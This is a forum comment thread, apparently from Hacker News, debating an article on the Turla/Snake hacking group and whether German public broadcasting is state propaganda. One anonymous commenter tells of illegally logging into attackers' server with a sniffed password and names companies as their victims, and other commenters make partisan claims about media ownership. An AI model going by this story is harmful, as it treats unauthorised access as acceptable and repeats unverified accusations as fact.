There's simply no forensic evidence of their claims here -- just a CPU-draining powerpoint show of nothingburgers. This reminds me of a slightly more modern version of Condoleeza Rice presenting fake evidence of Saddam Hussein's WMD development. Just a basic appeal to authority with a total lack of evidence.
though that's always the problem with non-opensource-secret-intelligence information. we either trust the government/system/organization, or we do not.
I have an interesting story that I can only recently share due to the statute of limitations passing. I'll stay anonymous for this story.
A number of years ago, I worked on a security team "somewhere". When I joined the place, I was given some context by the other employees about advanced intrusions in the past. For years I spent late nights pouring over my laptop trying to find every imaginable way of breaching the network, and searching for indicators of compromise. Until it happened!
When it happened, it happened so quickly I was blindsided. The attack took place during a time when we would least expect it (not holidays or a certain hour, something else). I was the first to notice the indicators of compromise. They were so quick to work through our network, they identified paths that took me years of research to locate in mere weeks. We were able to stop them, thanks to our network monitoring. Many the techniques they used were cutting edge research, released within the past month. Very impressive and informative. However.. a they made a mistake.
In one of their reverse shells, they were using scp to copy our files to their backup servers. See the mistake? By dumping the packet data from the reverse shell connection, a plaintext password to their server was available. And this is where the statute of limitations comes in.
I connected back to their server with Tor. "Hacking back" is illegal, but I (personally) had to know who bested my efforts to secure the network -- and what they had. What I found was fascinating. They rented out a Linux VPS on a well known provider, but they rebooted the system into a live OS to run in memory. For persistent storage, they connected an SSHFS mountpoint. I thought about it and realized how clever it was to run the OS in memory. If the server is shut down for forensics, nothing would be found.
I explored their files. They were curiously organized. Every one of their targets were stored in a separate folder under a single parent data exfiltration folder. They also had an exploits folder, which had only public exploits. I thought about it and this also made sense, you can avoid profiling by using public exploits. They changed the shellcode in the exploits, however. Their targets surprised me (almost as much as the access they achieved in them). Hetzner, Huawei, and many others. One target was a national security/defense entity of another country, and they set up a SSL/TLS MITM on their ENTIRE network and extracted all of their repositories and credentials. Unbelievable skill. I wouldn't believe it if it was in a movie.
They used their own proxy network, and to the best of my knowledge they only made one mistake. Because of that mistake, I believe I know who was responsible. I feel like I've already said too much though, this is the first time I've made a comment about my experiences in security. On the fence about sharing but I thought you all might enjoy the story!
Cool story, that does indeed sound like a plot out of a movie!
How were you able to extract a password from just listening to scp (ssh really) traffic though? Also, how did you know that someone's entire network was SSL MITM'd, only by looking at the data they dumped? Did the hackers store a readme file along with every dump?
The traffic containing the clear text password was not scp, it was the reverse shell they sent themselves. Reverse shells are unencrypted on the wire, and when scp prompted for the password, they typed it in over their reverse shell. A significant oversight on their part. If it was a team, it must have been a less experienced member who made that mistake.
As far as the SSL MITM goes, they indeed documented their attack with various files containing notes in English. They had a separate directory (within the target's folder) containing the certificates they were using in the attack.
Can't help but imagine your www-data which spawned nc, and it seems too amateurish for a high profile hacker group. Makes it seem as if they've copy-pasted the first one-liner reverse shell found on Google. Even the Metasploit framework has introduced payloads a while ago which do traffic encryption/obfuscation. Much more subtle reverse shells are used in the wild, where a compromised machine reaches out to hacker's server once in a while and receives commands and dumps output, even over something like ICMP/Loki or Covert TCP.
I'm thankful for Firefox reader view. Had that not worked, it would have been a quick Ctrl-A, Ctrl-C, Ctrl-V into my fav editor. Good article. I'm not sure why someone would intentionally make it more difficult to read. The world is swimming in content, but I'm not so certain attention spans have increased. Risky business.
That said, I don't disagree that the special effects seem impressive -- not that I'm competent to judge.
What about this is state propaganda? Turla/Snake is very real, the fact that they attacked several agencies like the german foreign ministry and others is very real, as well as that all of the connections shown in this article do exist and can be verified by doing some googling.
The article contains no proof except for references to documents published by the same government that is producing the article itself. It's propaganda.
.. just a quick reminder for anyone outside of dictatorships: there is independent media/press in germany, the article was not produced by any government entity.
>there is independent media/press in germany, the article was not produced by any government entity.
Perhaps, but the public broadcasting channels (Öffentlich-rechtlicher Rundfunk) aren't part of this. You can predict their reporting and spin with good accuracy depending on which political party they're aligned with (SPD -> ARD, CDU -> ZDF, NDR -> Die Grünen).
Barely. Besides the obvious state controlled public broadcasting many publishing houses are owned by mainstream parties and their foundations. The biggest socialist party SPD for example owns more than 40 newspapers. They are de-facto state media. Also the state spends about a quarter billion Euros (!) subsidising publishers that otherwise would go bankrupt. You can't expect the recipients of that money to be neutral.
> the article was not produced by any government entity
It is clearly published by a government entity. Public broadcasting is not a neutral party.
